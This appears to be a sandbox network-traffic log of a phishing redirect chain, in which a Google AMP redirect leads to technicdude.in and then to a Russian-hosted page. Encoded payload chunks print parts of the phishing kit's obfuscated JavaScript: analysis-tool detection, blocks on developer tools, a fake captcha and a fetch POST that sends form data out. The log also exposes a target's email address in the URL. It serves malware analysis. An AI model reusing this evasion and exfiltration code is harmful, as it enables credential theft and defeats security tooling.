                                                                    Location: https://www.google.com.vn/amp/technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==
                                                                    Cache-Control: private
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-oBEeUs_h2bUK0kuakJFCrw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                    Permissions-Policy: unload=()
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Wed, 15 Jan 2025 21:50:07 GMT
                                                                    Server: gws
                                                                    Content-Length: 321
                                                                    X-XSS-Protection: 0
                                                                    Set-Cookie: NID=520=QvSesO_zUi01XkiyDnHzQ7KtZeFdNbo0Ds35vXbH1YT0F7KVmNVyxbd8EHpuNahsNXOWWrpYGK-DbuH1pDWxZzs0tM_rOhPxIZTicbBQn8x6nHj7HXmEVUzxHLaKP-xGSWmB0K3FIxW6HYUexT0rsNTQwGlwl3e04dui19NdbAXL1TDu1KFFSgetiADh_FHu0qcIkO3Wzd0Pmw; expires=Thu, 17-Jul-2025 21:50:07 GMT; path=/; domain=.google.com.vn; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2025-01-15 21:50:07 UTC294INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 76 6e 2f 61 6d 70 2f 74 65 63 68 6e 69 63 64 75 64 65 2e 69 6e 2f 6f 70 75 79 63 2f 62 62 63 36 62 38 65 63 33 37 66 39 39 64 33 35 35 39 31 36 30 65 62 32 63 30 31 66 63 62 62 38 2f 5a 6e 4a
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com.vn/amp/technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJ
                                                                    2025-01-15 21:50:07 UTC27INData Raw: 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                    Data Ascii: here</A>.</BODY></HTML>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.849719216.58.212.1634434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:08 UTC1115OUTGET /amp/technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1
                                                                    Host: www.google.com.vn
                                                                    Connection: keep-alive
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Cookie: NID=520=QvSesO_zUi01XkiyDnHzQ7KtZeFdNbo0Ds35vXbH1YT0F7KVmNVyxbd8EHpuNahsNXOWWrpYGK-DbuH1pDWxZzs0tM_rOhPxIZTicbBQn8x6nHj7HXmEVUzxHLaKP-xGSWmB0K3FIxW6HYUexT0rsNTQwGlwl3e04dui19NdbAXL1TDu1KFFSgetiADh_FHu0qcIkO3Wzd0Pmw
                                                                    2025-01-15 21:50:08 UTC870INHTTP/1.1 302 Found
                                                                    Location: http://technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==
                                                                    Cache-Control: private
                                                                    X-Robots-Tag: noindex
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-F1WyxxcWiGFRTuBMqBswTg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Date: Wed, 15 Jan 2025 21:50:08 GMT
                                                                    Server: gws
                                                                    Content-Length: 298
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2025-01-15 21:50:08 UTC298INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 74 65 63 68 6e 69 63 64 75 64 65 2e 69 6e 2f 6f 70 75 79 63 2f 62 62 63 36 62 38 65 63 33 37 66 39 39 64 33 35 35 39 31 36 30 65 62 32 63 30 31 66 63 62 62 38 2f 5a 6e 4a 6c 5a 43 35 75 5a 58 64 6a 62 32 31 41 59 32 39 73 62 32 35 70 59 57
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYW


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.849720185.221.216.1024434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:09 UTC736OUTGET /opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1
                                                                    Host: technicdude.in
                                                                    Connection: keep-alive
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:09 UTC240INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:09 GMT
                                                                    Server: Apache
                                                                    Refresh: 0; url=https://r.bitualicar.ru/2Q5WxE/#ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=UTF-8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.849722104.21.86.914434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:10 UTC685OUTGET /2Q5WxE/ HTTP/1.1
                                                                    Host: r.bitualicar.ru
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-Dest: document
                                                                    Referer: https://technicdude.in/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:11 UTC1244INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: no-cache, private
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2BmmSrr788ulaZCO39ivDIjYMaA3oxaO1Sg8oQW0X9BXnLsCYp%2Bxunyn%2B5BUR4pzK42e1DCHCA2f4mfgRFk8wFkhqRSpxm3Ytiyhqifs4%2BiWoVzTH7OTkNqs34aSjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=5693&min_rtt=5619&rtt_var=1650&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1591&delivery_rate=487754&cwnd=251&unsent_bytes=0&cid=04828a52b6b6cc67&ts=584&x=0"
                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6IjJETXVOdGllbHAvSUxGeEZqb1lPOWc9PSIsInZhbHVlIjoiTE50V2ZLNzl4a2xZR1dCUGpyVld6TzhyVWtjYmxrNzg3dTNjVklJeG94YWoxZzZvdEFHbUFQMm5jd1B1ZXcrbmthL09tZERsUjZPU3h0TjZCSTlGT2o1TW13RTNtcmZJUS9tM3U0VVh5OEpjb0p3MVppT1NIWkVJeGFteklDOWgiLCJtYWMiOiI4YzAwNDE5MTVjMWVjMTJmOTE3YWNiMjBhMTBkNTJmNTNkODEyZDEzODgyMWE2OTU5NDVmZDYxYWFmYjAxZDNjIiwidGFnIjoiIn0%3D; expires=Wed, 15-Jan-2025 23:50:11 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                    2025-01-15 21:50:11 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 56 4f 55 47 35 33 5a 58 42 51 52 6e 59 76 55 30 59 30 64 56 46 4f 4d 31 67 77 63 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 59 54 63 78 59 58 70 71 64 6d 39 6e 4d 6d 52 79 54 32 52 53 4e 54 46 49 4d 48 6c 70 57 54 67 76 62 45 77 31 61 32 30 78 52 54 68 34 4d 32 78 46 53 47 6c 61 4c 30 39 6b 55 58 64 57 52 46 4a 7a 63 30 39 44 54 6e 41 31 61 32 4a 51 59 31 6c 59 54 6b 4a 34 59 6a 55 72 63 54 5a 76 56 7a 56 71 54 33 4e 74 53 32 52 52 4f 45 73 72 5a 54 52 47 54 56 5a 34 4e 56 4d 77 4d 55 63 78 64 6c 4a 36 64 6d 73 30 53 47 74 71 51 32 73 31 4b 33 6c 77 4d 55 4e 73 53 32 31 6d 4b 30 35 54 56 69 39 78 56 55 51 77 55 6e 5a 75 53 69 38
                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6InVOUG53ZXBQRnYvU0Y0dVFOM1gwcXc9PSIsInZhbHVlIjoiYTcxYXpqdm9nMmRyT2RSNTFIMHlpWTgvbEw1a20xRTh4M2xFSGlaL09kUXdWRFJzc09DTnA1a2JQY1lYTkJ4YjUrcTZvVzVqT3NtS2RROEsrZTRGTVZ4NVMwMUcxdlJ6dms0SGtqQ2s1K3lwMUNsS21mK05TVi9xVUQwUnZuSi8
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 34 65 35 30 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 77 61 6c 6b 69 6e 67 20 66 72 6f 6d 20 66 61 69 6c 75 72 65 20 74 6f 20 66 61 69 6c 75 72 65 20 77 69 74 68 20 6e 6f 20 6c 6f 73 73 20 6f 66 20 65 6e 74 68 75 73 69 61 73 6d 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 44 6f 20 6e 6f 74 20 62 65 20 65 6d 62 61 72 72 61 73 73 65 64 20 62 79 20 79 6f 75 72 20 66 61 69 6c 75 72 65 73 2c 20 6c 65 61 72 6e 20 66 72 6f 6d 20 74 68 65 6d 20 61 6e 64 20 73 74 61 72 74 20 61 67 61 69 6e 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 49 63 47 35 71 4c 6d 4a 70 64 48 56 68 62 47 6c 6a 59 58 49 75 63 6e 55 76 4d 6c 45 31 56 33 68 46 4c 77 3d 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f
                                                                    Data Ascii: 4e50... Success is walking from failure to failure with no loss of enthusiasm. --><script>/* Do not be embarrassed by your failures, learn from them and start again. */if(atob("aHR0cHM6Ly9IcG5qLmJpdHVhbGljYXIucnUvMlE1V3hFLw==") == "nomatch"){do
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 5a 6e 4a 7a 62 6e 4a 58 61 55 35 58 59 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 32 5a 79 63 32 35 79 56 32 6c 4f 56 32 49 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4e 44 5a 77 65 44 73 76 4b 6e 64 70 5a 48 52 6f 4f 69 41 78 4d 44 41 6c 4f 79 6f 76 63 47 46 6b 5a 47 6c 75 5a 79 31 79 61 57 64 6f 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 63 47 46 6b 5a 47 6c 75 5a 79 31 73
                                                                    Data Ascii: XplOjEuNXJlbTt9DQp9DQojZnJzbnJXaU5XYiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI2Zyc25yV2lOV2IuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNDZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1s
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49
                                                                    Data Ascii: lkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgI
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 45 70 5a 64 58 56 31 57 47 74 45 63 6c 6f 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 5a 47 56 69 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 47 4a 77 57 57 5a 48 56 58 4a 36 64 32 59 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 4a 77 57 57 5a 48 56 58 4a 36 64 32 59 67 4c 53 42 4b 57 58 56 31 64 56 68 72 52 48 4a 61 49 44 34 67 55 6e 64 4b 56 6e 56 49 53 6e 52 6f 57 53 41 6d 4a 69 41 68 61 33 4e 59 62 57 35 6b 57 6d 5a 70 62 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43
                                                                    Data Ascii: 7DQogICAgICAgIGNvbnN0IEpZdXV1WGtEclogPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVidWdnZXI7DQogICAgICAgIGNvbnN0IGJwWWZHVXJ6d2YgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKGJwWWZHVXJ6d2YgLSBKWXV1dVhrRHJaID4gUndKVnVISnRoWSAmJiAha3NYbW5kWmZpbykgew0KICAgICAgIC
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 31 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 56 68 49 69 42 32 59 57 78 31 5a 54 30 69 56 57 35 72 62 6d 39 33 62 69 49 2b 44 51 6f 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 47 52 68 64 47 45 69 49 47 35 68 62 57 55 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 32 59 57 78 31 5a 54 30 69 49 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 47 52 70 64 69 42 6a 62 47 46 7a 63 7a 30 69 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 46 53 6b 4e 59 56 48 42 34 55 57 5a 4e 49 6a 34 4e 43 6b 56 75 63 33 56 79 61 57 35 6e 49 48 4e
                                                                    Data Ascii: IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGR1YSIgbmFtZT0iYmx0ZHVhIiB2YWx1ZT0iVW5rbm93biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZGRhdGEiIG5hbWU9ImJsdGRkYXRhIiB2YWx1ZT0iIj4NCjwvZm9ybT4NCjwvZGl2Pg0KPGRpdiBjbGFzcz0idGV4dC1jZW50ZXIiIGlkPSJFSkNYVHB4UWZNIj4NCkVuc3VyaW5nIHN
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 30 5a 58 68 30 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 68 30 5a 58 68 30 49 44 30 39 49 44 41 70 65 77 30 4b 49 43 41 67 49 47 5a 6c 64 47 4e 6f 4b 47 46 6d 55 6c 56 34 62 47 78 51 61 55 77 73 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 62 57 56 30 61 47 39 6b 4f 69 41 69 55 45 39 54 56 43 49 73 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4a 76 5a 48 6b 36 49 47 35 6c 64 79 42 47 62 33 4a 74 52 47 46 30 59 53 68 33 53 46 6c 45 5a 32 4a 70 64 6c 4e 59 4b 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b
                                                                    Data Ascii: CAgfSkudGhlbih0ZXh0ID0+IHsNCiAgICBpZih0ZXh0ID09IDApew0KICAgIGZldGNoKGFmUlV4bGxQaUwsIHsNCiAgICAgICAgbWV0aG9kOiAiUE9TVCIsDQogICAgICAgIGJvZHk6IG5ldyBGb3JtRGF0YSh3SFlEZ2JpdlNYKQ0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0K
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 0d 0a 63 6f 6e 73 74 20 61 65 70 4e 71 53 63 55 6c 46 20 3d 20 66 67 63 43 76 5a 4b 74 6b 57 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 46 62 4b 75 76 77 73 7a 66 52 20 3f 20 66 67 63 43 76 5a 4b 74 6b 57 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 66 67 63 43 76 5a 4b 74 6b 57 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 66 69 6e 64 69 6e 67 20 73 61 74 69 73 66 61 63 74 69 6f 6e 20 69 6e 20 67 69 76 69 6e 67 20 61 20 6c 69 74 74 6c 65 20 6d 6f 72 65 20 74 68 61 6e 20 79 6f 75 20 74 61 6b 65 2e 20 2a 2f 0d 0a 69 66 28 61 65 70 4e 71 53 63 55 6c 46 20 3d 3d 20 46 62 4b 75 76 77 73 7a 66 52 29 7b 0d 0a 63 6f 6e 73 74 20 7a 6a 45 6b 52 55 55
                                                                    Data Ascii: const aepNqScUlF = fgcCvZKtkW.hostname === FbKuvwszfR ? fgcCvZKtkW.hostname : fgcCvZKtkW.hostname.split('.').slice(-2).join('.');/* Success is finding satisfaction in giving a little more than you take. */if(aepNqScUlF == FbKuvwszfR){const zjEkRUU
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 49 47 68 70 5a 47 52 6c 62 6a 73 4e 43 6e 30 4e 43 69 4e 6d 63 6e 4e 75 63 6c 64 70 54 6c 64 69 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 32 5a 79 63 32 35 79 56 32 6c 4f 56 32 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 32 5a 79 63 32 35 79 56 32 6c 4f 56 32 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a
                                                                    Data Ascii: IGhpZGRlbjsNCn0NCiNmcnNucldpTldiIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI2Zyc25yV2lOV2IgaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI2Zyc25yV2lOV2IgaDR7Zm9udC1zaXplOjEuNXJ
                                                                    2025-01-15 21:50:11 UTC1369INData Raw: 47 6c 6d 49 43 68 75 59 58 5a 70 5a 32 46 30 62 33 49 75 64 32 56 69 5a 48 4a 70 64 6d 56 79 49 48 78 38 49 48 64 70 62 6d 52 76 64 79 35 6a 59 57 78 73 55 47 68 68 62 6e 52 76 62 53 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 58 33 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 62 6d 46 32 61 57 64 68 64 47 39 79 4c 6e 56 7a 5a 58 4a 42 5a 32 56 75 64 43 35 70 62 6d 4e 73 64 57 52 6c 63 79 67 69 51 6e 56 79 63 43 49 70 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67
                                                                    Data Ascii: GlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywg


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.849721185.221.216.1024434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:10 UTC663OUTGET /favicon.ico HTTP/1.1
                                                                    Host: technicdude.in
                                                                    Connection: keep-alive
